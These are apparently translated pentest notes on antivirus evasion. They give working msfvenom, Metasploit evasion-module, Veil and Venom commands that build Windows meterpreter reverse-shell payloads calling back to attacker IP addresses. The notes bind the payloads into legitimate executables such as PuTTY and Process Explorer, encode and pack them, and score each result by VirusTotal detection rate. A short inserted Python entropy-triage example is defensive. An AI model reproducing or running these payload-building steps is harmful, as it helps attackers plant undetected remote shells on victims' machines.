MSF AV evasion
Multiple encoding: 54/70
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o 123.exe
Custom executable template: 36/70
https://download.sysinternals.com/files/ProcessExplorer.zip
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -x /home/kali/ProcessExplorer/procexp.exe -i 5 -f exe -o 123.exe
Bundling with an existing exe: 39/69
https://the.earth.li/~sgtatham/putty/0.67/x86/putty.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe
Also, whether the result evades detection depends partly on which exe you bundle with; some Microsoft tools can serve as the template exe.
Bundling + encoding: 35/69
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
The -i encoding iteration count can be changed; the more iterations, the more likely the payload evades detection. In testing, 5 and 6 iterations evaded 360. The detection rate on virustotal.com was 35/69.
Packing: 26/70
Here I pack with UPX: https://dl.pconline.com.cn/download/385120-1.html
Combined evasion: multiple encoding + custom template + packing: 25/70
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -x /home/kali/ProcessExplorer/procexp.exe -i 10 -f exe -o batmanfuture.exe
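Encoding chains, template injection and UPX packing all change how a binary's bytes look to a scanner, and the classic defensive counter is entropy triage: encoded or packed regions look close to random, and UPX additionally leaves its section names in the PE section table. The following Python is an added example, not part of these notes; the 7.2 bits/byte threshold, the 1024-byte window and the sample blobs are constructed assumptions.

```python
import hashlib
import math
from collections import Counter

# Assumed threshold (bits/byte): windows at or above it are treated as packed/encoded.
ENTROPY_THRESHOLD = 7.2
# Section names the UPX packer writes into the PE section table.
UPX_SECTION_NAMES = (b"UPX0", b"UPX1", b"UPX2")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated byte, 8.0 for a flat distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(blob: bytes, window: int = 1024) -> dict:
    """Slide a window over the blob; report peak entropy, the share of
    high-entropy windows, and any UPX section-name markers present."""
    windows = [blob[i:i + window] for i in range(0, len(blob), window)]
    entropies = [shannon_entropy(w) for w in windows]
    high = sum(1 for e in entropies if e >= ENTROPY_THRESHOLD)
    markers = [m for m in UPX_SECTION_NAMES if m in blob]
    return {
        "max_entropy": max(entropies, default=0.0),
        "high_entropy_ratio": high / len(windows) if windows else 0.0,
        "upx_markers": markers,
        "suspicious": high > 0 or bool(markers),
    }


def pseudo_random(n: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic filler standing in for encoded/packed bytes (constructed, not a payload)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed samples: repetitive text like an unmodified tool's data, versus a
# UPX-style section table fragment followed by high-entropy bytes.
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 100
PACKED_SAMPLE = b"UPX0" + b"\x00" * 4 + b"UPX1" + pseudo_random(4096)

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, triage(blob))
```

On a real file, read the bytes and pass them to triage(); a high ratio of high-entropy windows in a binary that should be mostly code and strings is a reason to pull it aside for deeper inspection.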
MSF evasion module
show evasion # list the evasion modules
Generate exe directly: 41/69
Use use windows/windows_defender_exe to generate the payload
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
msf5 evasion(windows/windows_defender_exe) > run
Generate hta: 28/59
Use use evasion/windows/windows_defender_js_hta to generate the payload
msf5 > use evasion/windows/windows_defender_js_hta
msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_js_hta) > set LPORT 3333
msf5 evasion(windows/windows_defender_js_hta) > run
Veil
# start veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
# output lands in /tmp/veil-output on the host by default
docker exec -it 4ae72dc914c9 /bin/bash # enter the veil container
Veil has two evasion tools, Evasion and Ordnance.
Ordnance generates shellcode for use in Veil-Evasion; Evasion handles file-level evasion.
Veil>: use 1 # select the Evasion tool
Veil/Evasion>: list # show the payload list
list shows 41 stagers
Payloads encoded in Go and Ruby are recommended; Python-style ones interact more with the user and are easily caught.
Veil generates exe directly: 47/68
Veil can generate MSF-compatible payloads directly, so we try that first to see how it fares.
We use the Go payload to generate the MSF payload.
Veil/Evasion>: use 16
Set the listener address and port
set lhost 192.168.43.73
set lport 4444
generate
Then set the name of the generated payload,
for example: go_msf
The generated exe appears in /tmp/veil-output/compiled/ on the host.
Detection rate is high: 360 dynamic scan not bypassed, static scan bypassed.
Veil + mingw-w64: 12/69 (bypasses 360)
First generate the shellcode with Veil
use 1
use 7
set lhost 192.168.43.73
set lport 4444
generate
c_msf
After c_msf.c with the shellcode is generated, compile it with gcc
gcc -o payload10.exe c_msf.c -l ws2_32

Venom
1. Clone from GitHub
git clone https://github.com/r00t-3xp10it/venom.git
2. Make the scripts executable
cd venom
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3. Install dependencies
cd aux
sudo ./setup.sh
4. Run venom
sudo ./venom.sh
On Parrot, the root user cannot start apache and similar services directly with systemctl start apache2.service; it has to be done as a normal user.
Venom generates exe: 30/70
We first generate the simplest one, module 4, which compiles an EXE from C
agent 4
Venom generates bat: 9/58
agent 1
rundll32.exe dll_msf.bat,main
Venom generates dll: 55/69
After choosing windows, pick the 12th agent to generate a dll; this produces dll_msf.dll
Copy the file to the test machine and run rundll32.exe dll_msf.dll,main from the command line
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor_context -i 6 -b '\x00' lhost=192.168.43.237 lport=10001 -f c -o shell.c
x64/zutto_dekiru
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' lhost=192.168.43.237 lport=10001 -f c -o shell123.c